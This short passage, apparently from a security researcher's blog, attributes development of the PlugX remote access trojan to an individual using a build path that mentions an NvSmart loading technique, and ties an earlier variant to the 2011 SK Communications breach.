With the information we have, we can say that this guy is behind the active development of the PlugX RAT. We can also say he probably has some insight into the operations, since the path “d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h” tells us that he knew the RAT was going to be weaponized through the NvSmart technique for use in the spearphishing campaigns.

According to this research, a previous version of this malware, also called Thoper/Tvt/Sogu, was used to compromise SK Communications in South Korea back in 2011.

jaime.blasco